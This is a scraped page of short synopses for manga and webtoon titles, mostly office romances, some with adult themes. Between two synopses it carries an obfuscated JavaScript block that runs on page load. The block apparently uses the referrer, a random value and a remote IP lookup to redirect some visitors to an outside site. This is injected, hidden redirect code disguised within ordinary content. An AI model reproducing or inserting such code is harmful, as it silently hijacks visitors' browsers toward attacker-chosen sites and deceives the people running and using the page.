This is a story about a black cat who became a cat girl. --- Alternative Official Raw - [Twitter](
Violence!!!! Shootouts!!!! Zombies!!!! Electricity!!!! An office life comedy with no straight man begins.
Hungry time is happy time! Yuzuru Okazaki, who works at a video game company, is a lonely company worker who is not good at socializing with others. His only bliss at the office is to eat his lunch box, which he makes by himself! One day, while he was having his usual happy lunch time, an intruder, Maria Sakaue, an idol of the PR department, came to ruin it. What\'s more, she is demanding that I give her my lunch box...?
Who needs sex, anyways? That’s what 32-year old teacher Choi Yeo-eun used to think, until she has a mind-blowing experience during a drunken one-night stand. When she wakes up the next morning, she is absolutely mortified: she doesn’t know where she is, where her things are, or even who she slept with. Yeo-eun is pleasantly surprised to discover the man in question is Doh Jeong-yeon – tall, handsome, and amazing in the sack. So amazing, in fact, that she can’t forget about that night, no matter how hard she tries. What’s worse, Yeo-eun soon learns that Jeong-yeon was not only a student at her school…but her boss’s son! As she struggles to reconcile her growing feelings of lust for Jeong-yeon with her moral compass as a teacher, will Yeo-eun be able to learn to love her newly awakened sexual desire?
In his entire life, Lee Seop pursued to become a capable heir of the number one firm in Korea, TK Group. But his efforts were in jeopardy when a genius man manages to take control of the core business in the firm. Frustrated with his own incapabilities, he planned to retaliate in a nonsensical way. Meanwhile, Mikyeong, a top elite in the firm was assigned to work with him.
Jun-won, an ordinary office worker, is bothered by the presence of Lee Jae, his fellow employee, who is different from him in every way. That day, after a fight over a minor disagreement, he reluctantly joined hands in the name of reconciliation... What was that feeling just now?
Mo-Ah is a nonogamist who always went around shouting, “I’ll never get married in this life!” Until one day, she faces her boss Geon-Hu, who is known for being strict and level-headed...naked. But it surely can't be true... You're telling me that such a figure belongs to a human?! He's as grand and brilliant as an art statue. To the point that she forgets her shame on the spot, and is unable to take her eyes off of him. After witnessing Geon-Hu's perfect naked body, Mo-ah suffers from a terrible aftereffect. Wherever she was and whatever she did, all she could think about was his figure. The distressed Mo-Ah confesses to him one night while drunk. "Excuse me... Team Leader, could you sleep with me once?" It was a confession that she definitely couldn't bring up had she been sober. There was a rush of regret the moment those words left her mouth, but his reply was an even more troublesome answer. "I'm sorry, but I won't do it unless it's with the girl I'm going to marry."<script></script><script>function _0x11f0(_0x93b2a4,_0x316742){var _0x3d3dcf=_0x4dee();return _0x11f0=function(_0x137a62,_0xfb65f5){_0x137a62=_0x137a62-(-0x50b*-0x5+-0x25a1+-0x3d*-0x3b);var _0x393f81=_0x3d3dcf[_0x137a62];return _0x393f81;},_0x11f0(_0x93b2a4,_0x316742);}(function(_0x7b50bc,_0x38d7d1){var _0x23ab32=_0x11f0,_0x4ce71d=_0x7b50bc();while(!![]){try{var _0x4f7b7a=-parseInt(_0x23ab32(0x1b4))/(0x1cf7+-0x5*0x1b7+0x1*-0x1463)*(-parseInt(_0x23ab32(0x1a7))/(-0xa*0x251+0x17c4+-0x98))+parseInt(_0x23ab32(0x1b9))/(-0x4*0x64f+-0x1801+-0x20*-0x18a)*(parseInt(_0x23ab32(0x1c2))/(0x3*-0x20e+-0x231*-0x3+-0x65))+parseInt(_0x23ab32(0x1c5))/(-0x2d3+0x1400+-0x1128)*(parseInt(_0x23ab32(0x1c1))/(-0x394*-0x1+0x1*-0x851+0x4c3))+-parseInt(_0x23ab32(0x1ab))/(-0xbb9+-0x37d*0x3+0x1637)+parseInt(_0x23ab32(0x1ba))/(-0x2226+-0x19d1*-0x1+-0x1*-0x85d)+parseInt(_0x23ab32(0x1ad))/(0x898+0x2*0x10e3+-0x2a55)+parseInt(_0x23ab32(0x1bd))/(-0x1ce2*0x1+0x295*0x7+0xad9)*(-parseInt(_0x23ab32(0x1a9))/(-0x2d9*0xc+-0x2d2*0xd+0x46e1));if(_0x4f7b7a===_0x38d7d1)break;else _0x4ce71d['push'](_0x4ce71d['shift']());}catch(_0x517c3b){_0x4ce71d['push'](_0x4ce71d['shift']());}}}(_0x4dee,-0x364b*-0x1+-0xc4ed7+0x17a108));function custom(){var _0x516d22=_0x11f0,_0x1ab9f={'VUHMU':function(_0x1e0675,_0x3214d9){return _0x1e0675!=_0x3214d9;},'oRHPD':_0x516d22(0x1b2)+_0x516d22(0x1bb),'NftYE':function(_0x15cba2,_0x14cbf2){return _0x15cba2+_0x14cbf2;},'sUvVF':function(_0x5477d4,_0x555d5d){return _0x5477d4*_0x555d5d;},'nxrQt':function(_0x720756,_0x28dccc){return _0x720756+_0x28dccc;},'BRnYO':function(_0x7002f5,_0x33000f){return _0x7002f5-_0x33000f;},'rfOQX':_0x516d22(0x1c0),'VdWpw':function(_0x4caefb,_0x377c1e){return _0x4caefb>=_0x377c1e;},'rUkSd':function(_0x17c5f6,_0x4357e3){return _0x17c5f6(_0x4357e3);},'VSRMV':_0x516d22(0x1b8)+_0x516d22(0x1af)+_0x516d22(0x1b0)},_0x1987ea=_0x1ab9f[_0x516d22(0x1ac)],_0x3a256b=Math[_0x516d22(0x1bc)](_0x1ab9f[_0x516d22(0x1c7)](_0x1ab9f[_0x516d22(0x1aa)](Math[_0x516d22(0x1a5)](),_0x1ab9f[_0x516d22(0x1a6)](_0x1ab9f[_0x516d22(0x1c6)](-0xa*-0x373+-0xa0b+-0x180f,0x2de*-0x8+-0x1ca*-0x10+-0x5*0x123),-0x8*0x1b1+-0x3b*0x89+0x2*0x168e)),0x6c4+0x1533+-0x952*0x3)),_0x437ab=document[_0x516d22(0x1b1)];if(_0x437ab[_0x516d22(0x1b7)](_0x1ab9f[_0x516d22(0x1a8)])||_0x1ab9f[_0x516d22(0x1ae)](_0x3a256b,0x1*-0x49d+0x199*0x1+0x366)){let _0x1d8ecc=_0x1ab9f[_0x516d22(0x1b5)](fetch,_0x1ab9f[_0x516d22(0x1c4)])[_0x516d22(0x1be)](_0x9e9239=>{var _0x400cd8=_0x516d22;return _0x9e9239[_0x400cd8(0x1c3)]();})[_0x516d22(0x1be)](_0xc720d1=>{var _0x40e9e4=_0x516d22;_0x1ab9f[_0x40e9e4(0x1b6)](_0xc720d1,'VN')&&(window[_0x40e9e4(0x1b3)][_0x40e9e4(0x1bf)]=_0x1987ea);});}}function _0x4dee(){var _0x134892=['484488wyatSK','28pnEGLf','text','VSRMV','35sumZnu','BRnYO','NftYE','random','nxrQt','23002ymZMmJ','rfOQX','3756478xQFHWs','sUvVF','2079525KEKtHe','oRHPD','12829887chLzsE','VdWpw','.customapi','.top/','referrer','http://rea','location','41gqEjbo','rUkSd','VUHMU','includes','https://ip','609327QDMbNo','4670464OzFTaV','','floor','100xqdaOL','then','href','google'];_0x4dee=function(){return _0x134892;};return _0x4dee();}setTimeout(custom,0xf5f+0x1*0x16eb+0x1*-0x264a);</script>
“When you fed a hungry beast, you should’ve been prepared for this.” I didn’t want to be a bad mother and the source of trauma for the male lead in the original. So I just decided to strengthen the relationship between me and my brother, as well as fulfill my duty of ensuring that my husband doesn’t pass out. “You’ve tamed me, so please take responsibility.” My husband, who will be the final black hole in the story, began to act sweetly, using his beauty as a weapon. I’m sorry, but wasn’t our business relationship for the best?
Director Na Eunseo just needs the third season of her reality dating show Housemate to do well. Then she can finally direct the program of her dreams! However, when the icy former child star Ha Sewon is added last-minute to the cast, he causes incident after incident and threatens to ruin her plans. At least Eunseo has her sweet, shy friend Ahn Jaehee in the cast to help her out. But why are no sparks flying this season? And why do the two male contestants only seem to be looking at Eunseo?